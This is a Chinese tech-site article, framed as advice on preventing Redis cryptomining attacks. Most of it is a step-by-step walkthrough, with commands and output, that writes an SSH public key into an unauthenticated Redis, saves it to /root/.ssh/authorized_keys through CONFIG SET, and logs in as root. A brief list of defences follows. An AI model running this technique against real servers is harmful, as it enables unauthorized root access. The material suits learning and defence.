iis服务器助手广告广告
返回顶部
首页 > 资讯 > 数据库 >Redis挖矿怎么预防
  • 729
分享到

Redis挖矿怎么预防

2024-04-02 19:04:59 729人浏览 八月长安
摘要

这篇“Redis挖矿怎么预防”文章的知识点大部分人都不太理解,所以小编给大家总结了以下内容,内容详细,步骤清晰,具有一定的借鉴价值,希望大家阅读完这篇文章能有所收获,下面我们一起来看看这篇“Redis挖矿怎

这篇“Redis挖矿怎么预防”文章的知识点大部分人都不太理解,所以小编给大家总结了以下内容,内容详细,步骤清晰,具有一定的借鉴价值,希望大家阅读完这篇文章能有所收获,下面我们一起来看看这篇“Redis挖矿怎么预防”文章吧。

Redis挖矿怎么预防

1、首先我们需要一些先决条件

  • 条件一:你首先要有一个Redis,并且我们要知道他的端口【默认6379】;

  • 条件二:Redis的密码不能过于复杂,或者没有密码;

  • 条件三:启动Redis的用户最好是Root用户,这样破坏性更大;

2、开始搞事情

  • 2.1 创建一对秘钥

通过ssh-keygen生成一对,当然可以使用已经有的都没有问题。

root@kali:/usr/local/srC# ssh-keygen 
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /tmp/rediskey/id_rsa

接下来通过公钥生成攻击键值

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n";) > foo.txt

内容如下

root@kali:/tmp/rediskey# cat foo.txt 

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9MlQtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGCNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali

这里前后增加两个换行符是为了防止数据连接在一起造成失效问题。

  • 2.2 配置Key到Redis中

操作如下:

root@kali:/tmp/rediskey# cat foo.txt |redis-cli -h 192.168.243.129 -x set bar
OK

登录Redis进行检查,是否已经写入进Redis中。

root@kali:/tmp/rediskey# redis-cli -h 192.168.243.129
192.168.243.129:6379> get bar
"\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali\n\n\n\n"
  • 2.3 通过Redis保存机制替换系统文件

且看如下操作

192.168.243.129:6379> config set dir /root/.ssh
OK
192.168.243.129:6379> config get dir
1) "dir"
2) "/root/.ssh"
192.168.243.129:6379> config set dbfilename "authorized_keys"
OK
192.168.243.129:6379> save
OK
192.168.243.129:6379> exit

这个时候,我们登录远程主机看下效果。

root@kali:/tmp/rediskey# ssh -i id_rsa root@192.168.243.129
The authenticity of host '192.168.243.129 (192.168.243.129)' can't be established.
ECDSA key fingerprint is SHA256:XTnAL+b8HB5FL/t3ZlZqt0EfmTBgj7TI5VBU0nSHSGU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.243.129' (ECDSA) to the list of known hosts.
linux kali 4.19.0-kali3-amd64 #1 SMP Debian 4.19.20-1kali1 (2019-02-14) x86_64

Last login: Sun Apr 14 20:52:40 2019 from 192.168.243.1
root@kali:~# w

OK,到这里我们已经提权成功了,那我们看下导出文件到底是什么呢?其实就是Redis的保存文件形式罢了,有兴趣可以自己打开看看,这里不再展示。

3、如何预防

这个漏洞威力还是挺大的,我们现在只是拿到主机权限一个而已,加入放到定时任务执行一些脚本然后在批量感染呢?

防范的技巧如下:

  • Redis不要监听在危险IP上,如果有请加防火墙控制;

  • Redis一定要增加密码限制,且不能是弱口令;

  • Redis尽量不要用Root用户身份来启动。

做到如上三点防范Redis挖矿,没问题的

以上就是关于“Redis挖矿怎么预防”这篇文章的内容,相信大家都有了一定的了解,希望小编分享的内容对大家有帮助,若想了解更多相关的知识内容,请关注编程网数据库频道。

您可能感兴趣的文档:

--结束END--

本文标题: Redis挖矿怎么预防

本文链接: https://www.lsjlt.com/news/71308.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

本篇文章演示代码以及资料文档资料下载

下载Word文档到电脑,方便收藏和打印~

下载Word文档
猜你喜欢
  • Redis挖矿怎么预防
    这篇“Redis挖矿怎么预防”文章的知识点大部分人都不太理解,所以小编给大家总结了以下内容,内容详细,步骤清晰,具有一定的借鉴价值,希望大家阅读完这篇文章能有所收获,下面我们一起来看看这篇“Redis挖矿怎...
    99+
    2024-04-02
  • Redis挖矿原理的示例分析
    这篇文章主要介绍Redis挖矿原理的示例分析,文中介绍的非常详细,具有一定的参考价值,感兴趣的小伙伴们一定要看完!演示一下如果通过Redis进行提权获取远程服务器的Root用户。1、首先我们需要一些先决条件...
    99+
    2024-04-02
  • redis漏洞怎么预防
    redis漏洞的预防方法:禁止外网访问Redis,例如修改redis.conf 文件中”bind 127.0.0.1“,使得Redis服务仅当前主机可用。2将配置文件redis.conf中的”Port 6379“,改成其他端口。设置ipta...
    99+
    2024-04-02
  • 云服务器怎么挖矿
    云服务器挖矿是指通过在使用云服务器的过程中进行挖矿来获得奖励的行为。挖矿通常需要使用算力来进行,这些算力可以用于执行任何可验证的操作,包括创建、删除和修改数据等。 一旦服务器被配置为挖矿,它可以执行以下操作: 创建虚拟资源,通常是指网络...
    99+
    2023-10-26
    挖矿 服务器
  • 怎么用云服务器挖矿
    用云服务器挖矿是一种常见的加密货币挖矿方式,它通过使用云服务器来存储比特币交易和计算比特币哈希值来获得比特币奖励。下面是云服务器挖矿的步骤: 安装挖矿软件和工具。在购买云服务器之前,建议您下载一个挖矿软件和工具来使用。例如Bitcoin...
    99+
    2023-10-26
    挖矿 服务器
  • 阿里云服务器如何防止挖矿?
    随着区块链技术的发展,挖矿成为了一个备受关注的话题。在挖矿的过程中,需要大量的计算资源,而这些资源往往需要通过服务器来实现。因此,如何防止挖矿成为了一个重要的问题。本文将详细介绍阿里云服务器如何防止挖矿。 一、了解挖矿和挖矿攻击挖矿是一种...
    99+
    2023-10-30
    阿里 挖矿 如何防止
  • 云服务器被挖矿怎么办
    如果您怀疑云服务器中有一个挖矿程序正在运行,您可以尝试以下方法来解决此问题: 检查您的账户是否有足够的余额进行访问。 重新启动您的云服务以尝试将其重新加载到生产环境中。 重新安装您的操作系统和应用程序版本。 检查您的 CPU 、内存等资...
    99+
    2023-10-26
    挖矿 服务器
  • 怎么用云服务器挖矿手机
    挖矿是一种使用算力进行加速货币转移的过程。以下是一些用于挖矿的云服务器的常见用途: 加速网络流量:如果一个应用程序需要大量的数据传输,那么通过使用云服务器加速网络流量可以提高应用程序的性能和效率。 处理大数据:使用云服务器处理大量数据可...
    99+
    2023-10-26
    挖矿 服务器 手机
  • 亚马逊挖矿服务器怎么开
    购买或租用一个云服务器。 安装挖矿软件。 配置高性能的硬件,以支持挖掘chia币。 确保使用高速网络连接,以便快速访问云服务器。 使用亚马逊云提供的chia挖矿功能,可以使用GPU或TensorFlow等挖矿工具进行挖矿。 在购买或租...
    99+
    2023-10-27
    亚马逊 挖矿 服务器
  • 用云服务器挖矿会怎么样
    使用云服务器挖矿可能会带来以下影响: 挖矿效率:使用云服务器挖矿可以快速获得收益,因为每个节点都有相同的时间生产相同的资源。这种方式可能需要大量的计算资源,因为节点可能会随时增加以确保收益。 交易速度:因为云服务器是去中心化的,它具有更...
    99+
    2023-10-26
    挖矿 服务器
  • 云服务器可以挖矿么
    云服务器可以挖矿,也就是说可以从使用云服务器的用户那里获得一定的收益。云服务器可以挖掘比特币和以太坊这样的加密货币,也可以被视为一个虚拟数字资产交易所。 云服务器通常通过两种方式获得收益,一种是向用户出售计算资源或者提供其他服务,例如存储...
    99+
    2023-10-26
    挖矿 服务器
  • 云服务器挖矿收益怎么样
    云服务器挖矿是一种虚拟货币挖矿方式,通过购买云服务器来挖矿,可以获得虚拟货币。挖矿需要使用网络资源和计算资源来创建块,挖出的矿石可以使用来购买虚拟货币和其他奖励,如云豆等。 云服务器的挖矿收益取决于云服务器的算力和资源。不同的云服务器资源...
    99+
    2023-10-26
    挖矿 收益 服务器
  • 数据库的挖矿脚本怎么写
    本篇内容介绍了“数据库的挖矿脚本怎么写”的有关知识,在实际案例的操作过程中,不少人都会遇到这样的困境,接下来就让小编带领大家学习一下如何处理这些情况吧!希望大家仔细阅读,能够学有所成!01.Code 1#!/bin/sh脚本的第一行,看起来...
    99+
    2023-06-17
  • 亚马逊挖矿服务器怎么选择
    在选择亚马逊的挖矿服务时,可以考虑以下几点: 1、性能:选择适合自己业务的亚马逊挖矿服务,可以参考各项指标,如带宽、延迟、CPU使用率等。 2、安全性:亚马逊的挖矿服务需要安全措施,如防火墙、SSL证书等,确保用户的信息安全。 3、容量:...
    99+
    2023-10-27
    亚马逊 挖矿 服务器
  • 云服务器禁止挖矿怎么解除
    一、 检查网络连接 在禁止挖矿后,需要确保云服务器的网络连接是正常的。可以尝试断开云服务器与互联网的连接,然后重新连接网络,以确保云服务器的网络连接是稳定的。 二、 更新操作系统补丁 更新操作系统补丁是一种有效的解禁方法。操作系统会自动更...
    99+
    2023-10-27
    挖矿 服务器
  • Linux Redis自动化挖矿感染蠕虫实例分析
    本文小编为大家详细介绍“Linux Redis自动化挖矿感染蠕虫实例分析”,内容详细,步骤清晰,细节处理妥当,希望这篇“Linux Redis自动化挖矿感染蠕虫实例分析”文章能帮助大家解决疑惑,下面跟着小编的思路慢慢深入,一起来学习新知识吧...
    99+
    2023-06-04
  • 阿里云服务器挖矿怎么解决
    简介 随着比特币等加密货币的兴起,越来越多的人开始关注和参与挖矿活动。然而,对于一些用户来说,使用阿里云服务器进行挖矿可能会遇到一些问题。本文将介绍如何解决阿里云服务器挖矿的问题,并提供一些实际案例。1. 选择合适的实例规格在使用阿里云服务...
    99+
    2024-01-17
    阿里 挖矿 服务器
  • 云服务器挖矿病毒怎么解决
    云服务器挖矿病毒是一种可以在未经允许的情况下访问云服务器的恶意软件。以下是如何解决云服务器挖矿病毒的几种方法: 立即断开云服务器的网络连接,以防止病毒在未经允许的情况下访问云服务器。 使用杀毒软件扫描云服务器中的可疑文件,如 Wanna...
    99+
    2023-10-26
    挖矿 病毒 服务器
  • 云服务器挖矿怎么不被检测
    云服务器挖矿是一种非常危险的活动,因为它可能会导致计算机系统受到严重损害和数据泄露。因此,通常不会对云服务器进行检测或控制。然而,随着越来越多的人使用云服务器,挖矿活动变得越来越普遍,因此云服务器的检测也变得越来越重要。 一些传统的检测方...
    99+
    2023-10-26
    不被 挖矿 服务器
  • 云服务器挖矿怎么不被检测到
    云服务器挖矿是一种不受信任的加密货币挖矿方式,因此很难检测到。 检测这种挖矿方式需要使用复杂的技术,如对抗攻击,反欺诈等,这些技术通常需要大量的资源和时间进行研究和开发。 在检测这种挖矿方式时,建议使用一些检测工具来检测挖矿过程中的异常行...
    99+
    2023-10-26
    不被 检测到 挖矿
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作